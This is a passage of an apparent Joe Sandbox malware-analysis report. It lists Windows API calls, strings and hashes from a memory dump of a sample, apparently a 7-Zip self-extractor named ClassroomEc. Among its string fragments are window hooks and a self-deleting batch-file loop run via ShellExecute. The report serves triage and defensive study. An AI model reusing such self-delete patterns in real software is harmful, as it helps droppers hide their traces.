                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00A7A0D0
                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00A7A0EC
                                                                                                                                                      • DialogBoxIndirectParamW.USER32(?,00000000,?,Function_00008D70,?), ref: 00A7A138
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Resource$CapsDeviceDialogFindHandleIndirectInfoLoadLockModuleParamParametersReleaseSystemmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3119308957-0
                                                                                                                                                      • Opcode ID: 9520225625ecf48b5fb5f48a0398b07e7719a645dcea2c833d2de2aa4e05bf0e
                                                                                                                                                      • Instruction ID: 3a97b1513a9ceb41c578ae0e559920d05feae468e022b8fcc45f285d8130623d
                                                                                                                                                      • Opcode Fuzzy Hash: 9520225625ecf48b5fb5f48a0398b07e7719a645dcea2c833d2de2aa4e05bf0e
                                                                                                                                                      • Instruction Fuzzy Hash: 964129B4A04228AFDB62CF64CC49BEAB7B8BB48701F0481CDE51DA6290DB715F85CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _wtol.MSVCRT(?), ref: 00A75223
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00A75352
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7536D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugFolderHeapPathSpecial_wtol
                                                                                                                                                      • String ID: .lnk
                                                                                                                                                      • API String ID: 3713458237-24824748
                                                                                                                                                      • Opcode ID: 659fef4a57c0f2adbb9a0b44d06875e98c983472a5fad5bc948845264de74788
                                                                                                                                                      • Instruction ID: 60d3ea488866c7fe805397530142deba82d18184b739e60d453943afdcd7bea5
                                                                                                                                                      • Opcode Fuzzy Hash: 659fef4a57c0f2adbb9a0b44d06875e98c983472a5fad5bc948845264de74788
                                                                                                                                                      • Instruction Fuzzy Hash: 14025A719105199BCB14EF64DD95BEDB7B8AF18304F50C199E00EAA1A1EF70AE84CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(uxtheme,?,?,000004B2,?), ref: 00A79F3E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00A79F56
                                                                                                                                                      • GetWindow.USER32(00000000,00000005), ref: 00A79F70
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00A79F96
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$AddressLibraryLoadProc
                                                                                                                                                      • String ID: SetWindowTheme$uxtheme
                                                                                                                                                      • API String ID: 324724604-1369271589
                                                                                                                                                      • Opcode ID: ef22abbf561d6cac76898fb9c8a25214bdb6e139ea677f82e50782bff14b54f9
                                                                                                                                                      • Instruction ID: 3d6449555986515905a6c90264bc8b39605403e12a6f4e05f1befa0aaa2a616d
                                                                                                                                                      • Opcode Fuzzy Hash: ef22abbf561d6cac76898fb9c8a25214bdb6e139ea677f82e50782bff14b54f9
                                                                                                                                                      • Instruction Fuzzy Hash: 7C01C874E40218BFEB00AFE8D84EB9EBBB4FB08705F10C99AE515A6290DA755A40CF40
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A78CEF
                                                                                                                                                      • SetWindowsHookExW.USER32(00000007,Function_00008A80,00000000,00000000), ref: 00A78CFF
                                                                                                                                                        • Part of subcall function 00A78990: _DebugHeapAllocator.LIBCPMTD ref: 00A789AF
                                                                                                                                                        • Part of subcall function 00A78990: wsprintfW.USER32 ref: 00A789E1
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A78D13
                                                                                                                                                      • SetWindowsHookExW.USER32(00000002,Function_00008B60,00000000,00000000), ref: 00A78D23
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentHookThreadWindows$AllocatorDebugHeapwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3455760282-0
                                                                                                                                                      • Opcode ID: 56e242688be4f9e4221363776a6b87f1a5ad9dae14d3cf66722ffa8a0b8cc8ec
                                                                                                                                                      • Instruction ID: fe190a1a973247b4cfcd48ab23e31cc3064d518c1ba60850e3c452d2d32ba19d
                                                                                                                                                      • Opcode Fuzzy Hash: 56e242688be4f9e4221363776a6b87f1a5ad9dae14d3cf66722ffa8a0b8cc8ec
                                                                                                                                                      • Instruction Fuzzy Hash: D9117974A40208EFDB10DFA8ED89B69B7B0BB44304F11C05AE609562A2DF752D82CF14
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00027C92), ref: 00A97CDA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                      • Opcode ID: 92fb9a896396cf35278b6e5aa02cde644ab0d9c8f8fe13ea0582d052343650be
                                                                                                                                                      • Instruction ID: 07ddcac25a34189869f899b158ce0fd12b325a7b4e9ea165c7bd18aac272f774
                                                                                                                                                      • Opcode Fuzzy Hash: 92fb9a896396cf35278b6e5aa02cde644ab0d9c8f8fe13ea0582d052343650be
                                                                                                                                                      • Instruction Fuzzy Hash: 84900264365101668E9457B45C0E80E65E87B49702F5189596441C4054DE6140015521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2e238170ea055109cb47943994eb06b5be56588a226d843496a50fd685f2b274
                                                                                                                                                      • Instruction ID: 6c26674a386588894a65653882a427808ea8405668eeb7e571557daf3fb138df
                                                                                                                                                      • Opcode Fuzzy Hash: 2e238170ea055109cb47943994eb06b5be56588a226d843496a50fd685f2b274
                                                                                                                                                      • Instruction Fuzzy Hash: 14F067B5A04209DF8B09CF99D48189EFBF5FF49310B1081A9EC1997350D731AA51CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A76DE7
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00A9A398), ref: 00A76E7B
                                                                                                                                                      • _wtol.MSVCRT(00000000), ref: 00A76FA4
                                                                                                                                                      • _wtol.MSVCRT(00000000), ref: 00A76FCE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wtol$AllocatorDebugHeap_wmemmovelstrcmpi
                                                                                                                                                      • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title
                                                                                                                                                      • API String ID: 1673552667-694992937
                                                                                                                                                      • Opcode ID: c49252f86dcbc6f9352dd06debc0c78c736cb4f822b2c27b2baafb7f19504cd2
                                                                                                                                                      • Instruction ID: d296ff2d672a7caf239532458c286f18eef03fc35cd0aad328c6de91a4576d74
                                                                                                                                                      • Opcode Fuzzy Hash: c49252f86dcbc6f9352dd06debc0c78c736cb4f822b2c27b2baafb7f19504cd2
                                                                                                                                                      • Instruction Fuzzy Hash: BC716FB4E41204FBEB01EFA8FE0A7AD7BB0AB44705F24C469E40967291E7711F45DB62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00A79410
                                                                                                                                                      • LoadIconW.USER32(00000000), ref: 00A79417
                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00A79424
                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 00A7942D
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00A7943A
                                                                                                                                                      • LoadImageW.USER32(00000000), ref: 00A79441
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000004B2), ref: 00A7949A
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000004B2,000000F0), ref: 00A794B6
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000004B5), ref: 00A794CC
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00A794E8
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00A79607
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00A79628
                                                                                                                                                        • Part of subcall function 00A79A30: GetWindowTextLengthW.USER32(00000000), ref: 00A79A44
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00A7968C
                                                                                                                                                      • LoadIconW.USER32(00000000), ref: 00A79693
                                                                                                                                                      • LoadIconW.USER32(00000000,00007F02), ref: 00A796A5
                                                                                                                                                      • LoadIconW.USER32(00000000,00007F01), ref: 00A796B7
                                                                                                                                                      • LoadIconW.USER32(00000000,00007F04), ref: 00A796C9
                                                                                                                                                      • SendMessageW.USER32(00000000,000004B1,00000172,00000001), ref: 00A796FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Load$Icon$Long$HandleModule$MetricsSystem$ImageLengthMessageSendText
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1276301936-0
                                                                                                                                                      • Opcode ID: ba35b8338bd8574f6f3c45e60fc994dbb6088b746bdd5ed7ec67577df04dd9f4
                                                                                                                                                      • Instruction ID: c3d5b75c278cc9d9966a2c72792b46d1d8a98439675df83ef39fe3b2cbfd9bfb
                                                                                                                                                      • Opcode Fuzzy Hash: ba35b8338bd8574f6f3c45e60fc994dbb6088b746bdd5ed7ec67577df04dd9f4
                                                                                                                                                      • Instruction Fuzzy Hash: 9DA11C70A40205AFEB04DBA4DE5ABAF7775BB44701F20C12AF60A7B2D1CB746E41CB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetDriveTypeW.KERNEL32(00A78375,?,?,?,?,?,?,?,?,?,?,?,?,00A78375,00A9D4FC), ref: 00A785D4
                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00A78627
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7864A
                                                                                                                                                      • WriteFile.KERNEL32(000000FF,00000000,00A78375,del ",:Repeat), ref: 00A786EE
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00A78703
                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00A78752
                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00A7876E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AllocatorAttributesCloseCreateDebugDriveExecuteHandleHeapShellTypeWrite
                                                                                                                                                      • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                                                      • API String ID: 3581052426-3467708659
                                                                                                                                                      • Opcode ID: 3ebf2dae107b41b4ceace0998bd8b3973bd8bd06a6252ec5a913843cabb7c5d5
                                                                                                                                                      • Instruction ID: db53fb5595909de3b92498bd1f7849d43cc343735c3f815af7c3370385f7d4f3
                                                                                                                                                      • Opcode Fuzzy Hash: 3ebf2dae107b41b4ceace0998bd8b3973bd8bd06a6252ec5a913843cabb7c5d5
                                                                                                                                                      • Instruction Fuzzy Hash: AA515471A40208AACB04FBA4DD57BEE7774AF24300F50C469F50A760E2EF756E49CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A78A60: GetDlgItem.USER32(?,00000000), ref: 00A78A72
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000004B3), ref: 00A79AA3
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000004B4), ref: 00A79AEA
                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00A79BA6
                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00A79BB1
                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00A79BBC
                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00A79BD0
                                                                                                                                                      • GetParent.USER32(00000000), ref: 00A79C0F
                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00A79C38
                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00A79C46
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000004), ref: 00A79CD7
                                                                                                                                                        • Part of subcall function 00A799F0: SetWindowPos.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,00A79F21,?,?,?,?,?), ref: 00A79A1D
                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00A79C2A
                                                                                                                                                        • Part of subcall function 00A797C0: GetDlgItem.USER32(00000000,?), ref: 00A797D8
                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00A79E53
                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00A79E69
                                                                                                                                                        • Part of subcall function 00A78B40: GetClientRect.USER32(00000000,?), ref: 00A78B54
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsSystem$ClientWindow$ItemLongRectScreen$Parent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3176548655-0
                                                                                                                                                      • Opcode ID: b91e02b8ef41da04909c88aade994b9e0b61dba7c52fbbec2575f125b76ea533
                                                                                                                                                      • Instruction ID: 5069b4c95110466d0fb55280ad1cb76fd12b4af7d4137563321a3e40819b94a4
                                                                                                                                                      • Opcode Fuzzy Hash: b91e02b8ef41da04909c88aade994b9e0b61dba7c52fbbec2575f125b76ea533
                                                                                                                                                      • Instruction Fuzzy Hash: 1DE1C474E00219EFDB08DFA8DD95AEEBBB5FF88300F108259E505A7295CB74AD42CB54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetParent.USER32(?), ref: 00A7A4DC
                                                                                                                                                      • GetWindowLongW.USER32(00000000), ref: 00A7A4E3
                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00A7A502
                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 00A7A534
                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 00A7A53F
                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00A7A54A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$MetricsProcSystem$CallLongParent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2567644265-0
                                                                                                                                                      • Opcode ID: f9dde4e054fef535a789f96bb5ed2155321e674a06dadfc498f3d80bba25010c
                                                                                                                                                      • Instruction ID: f2b6ba9abb2e816110c9448c11e9f9b8a0ded15ff8aa795369a3af4e48c5476b
                                                                                                                                                      • Opcode Fuzzy Hash: f9dde4e054fef535a789f96bb5ed2155321e674a06dadfc498f3d80bba25010c
                                                                                                                                                      • Instruction Fuzzy Hash: 8241AA75A00209AFDB44CFE8DD88EEE7BB9BB4C311F148649F509A7294CB34E941CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8733A
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87345
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87350
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8735B
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87366
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87371
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8737C
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87387
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87392
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8739D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3936482309-0
                                                                                                                                                      • Opcode ID: 30382dc69e5fbf3bce174492a72467cb88e27a62c99ef59bb35e038e791f01f9
                                                                                                                                                      • Instruction ID: 4f199f673a18cec312e9a5dbafd56390783ecabf35b7b69903c422ceed94a9e0
                                                                                                                                                      • Opcode Fuzzy Hash: 30382dc69e5fbf3bce174492a72467cb88e27a62c99ef59bb35e038e791f01f9
                                                                                                                                                      • Instruction Fuzzy Hash: 3B419A74A00109DBCB08EFD8C6A5BADB7F2AF54308F648198D4066B342CB719F55EBD5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7458E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap
                                                                                                                                                      • String ID: R$SetEnvironment
                                                                                                                                                      • API String ID: 571936431-1698439222
                                                                                                                                                      • Opcode ID: 2a8ce9596df819198ef964d36b58981c1cca20e5cf634a8db14539da83ee45f2
                                                                                                                                                      • Instruction ID: bea2055ecd669444d18c997385605eedfacd551c97bb5160880e8c0924f99cc9
                                                                                                                                                      • Opcode Fuzzy Hash: 2a8ce9596df819198ef964d36b58981c1cca20e5cf634a8db14539da83ee45f2
                                                                                                                                                      • Instruction Fuzzy Hash: 72E1A0B1D00148EBCF08EBE4ED919FEBB79AF59304F14C129F51A6B252EB305A05DB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
